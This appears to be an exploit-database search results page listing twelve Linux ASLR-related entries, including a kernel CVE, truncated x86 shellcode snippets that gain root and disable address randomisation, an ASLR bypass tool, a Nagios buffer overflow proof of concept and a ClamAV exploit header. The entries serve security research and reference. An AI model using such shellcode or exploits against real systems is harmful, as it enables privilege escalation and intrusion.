12 matches found
CVE-2024-46826
In the Linux kernel, the following vulnerability has been resolved: ELF: fix kernel.randomize_va_space double read ELF loader uses "randomize_va_space" twice. It is sysctl and can change at any moment, so 2 loads could see 2 different values in theory with unpredictable consequences. Issue exactly on...
CVE-2024-46826 ELF: fix kernel.randomize_va_space double read
In the Linux kernel, the following vulnerability has been resolved: ELF: fix kernel.randomize_va_space double read ELF loader uses "randomize_va_space" twice. It is sysctl and can change at any moment, so 2 loads could see 2 different values in theory with unpredictable consequences. Issue exactly on...
Linux/x86 - Execve() Alphanumeric Shellcode (66 bytes)
Title: Linux/x86 - Execve Alphanumeric Shellcode 66 bytes Shellcode Author: bolonobolo Tested on: Linux x86 execve.asm global start section .text start: ; int 0x80 ------------ push 0x30 pop eax xor al, 0x30 push eax pop edx dec eax xor ax, 0x4f73 xor ax, 0x3041 push eax push edx pop eax...
ASLRay - Linux ELF x32 and x64 ASLR bypass exploit with stack-spraying
Linux ELF x32 and x64 ASLR bypass exploit with stack-spraying. Properties: ASLR bypass Cross-platform Minimalistic Simplicity Unpatchable Dependencies: Linux 2.6.12+ - will work on any x86-64 Debian-based OS BASH - the whole script Limitations: Stack needs to be executable -z execstack Binary has...
Linux/x86 - Disable ASLR Shellcode (80 bytes)
Linux/x86 - Disable ASLR Shellcode 80 bytes. Shellcode exploit for Linx86 platform / Linux/x86 setuid-disable-aslr.c by @abatchy17 - abatchy.com Shellcode size: 80 bytes SLAE-885 section .text global start start: ; ; setruid0,0 ; xor ecx,ecx mov ebx,ecx push 0x46 pop eax int 0x80 ; ;...
linux/x86 to see /proc/sys/kernel/randomize_va_space - 79 bytes
/ Exploit Title : linux/x86 execve"/bin/cat", "/bin/cat", "/proc/sys/kernel/randomize_va_space", NULL - 79 bytes Exploit Author : Febriyanto Nugroho Tested on : Linux Debian 5.0.5 / include char shellcode = "\x31\xdb" "\x6a\x17" "\x58" "\xcd\x80" "\x8d\x43\x0b" "\x99" "\x52" "\x68\x2f\x63\x61\x74"...
Linux/x86 - Disable randomize stack addresse - 106 bytes
No description provided by source. / Title: Linux/x86 - Disable randomize stack addresse - 106 bytes Set randomize_va_space to zero Author: Jonathan Salwan submit ! shell-storm.org Web: http://www.shell-storm.org Twitter: http://twitter.com/jonathansalwan !Database of Shellcodes...
Nagios Plugins check_ups - Local Buffer Overflow (PoC)
Advisory: Nagios Plugin 'check_ups' local buffer overflow Author: Stefan Schurtz Contact: [email protected] Affected Software: Successfully tested on nagios-plugins-1.4.15 Vendor URL: http://nagiosplugins.org/ ./check_ups -u perl -e 'print "A"x16407' buffer overflow detected : ./check_ups...
Linux/x86 - Disable randomize stack addresse - 106 bytes
Linux/x86 - Disable randomize stack addresse - 106 bytes. Shellcode exploit for linux platform / Title: Linux/x86 - Disable randomize stack addresse - 106 bytes Set randomize_va_space to zero Author: Jonathan Salwan Web: http://www.shell-storm.org Twitter: http://twitter.com/jonathansalwan !Databas...
linux/x86 - setuid0 . setgid0 . aslr_off 79 bytes
linux/x86 setuid0 . setgid0 . aslr_off 79 bytes. Shellcode exploit for linx86 platform / Linux/x86 Fedora 8 setuid0 + setgid0 + execve"echo 0 /proc/sys/kernel/randomize_va_space" by LiquidWorm 2008 c www.zeroscience.org liquidworm at gmail.com 79 bytes. / char sc = "\x6a\x17" // push $0x17 "\x58" //...
linux/x86 setuid(0) . setgid(0) . aslr_off 79 bytes
No description provided by source. / Linux/x86 Fedora 8 setuid0 + setgid0 + execve"echo 0 /proc/sys/kernel/randomize_va_space" by LiquidWorm 2008 c www.zeroscience.org liquidworm at gmail.com 79 bytes. / char sc = "\x6a\x17" // push $0x17 "\x58" // pop %eax "\x31\xdb" // xor %ebx, %ebx "\xcd\x80" /...
ClamAV 0.91.2 - libclamav MEW PE Buffer Overflow
''' clamav-0.91.2 exploit CVE-2007-6335 c Thomas Pollet [email protected] we own dsize in readdesc, src + dsize, exesectionsi + 1.rsz != exesectionsi + 1.rsz exploited with randomize_va_space = 0 ''' import struct exe=...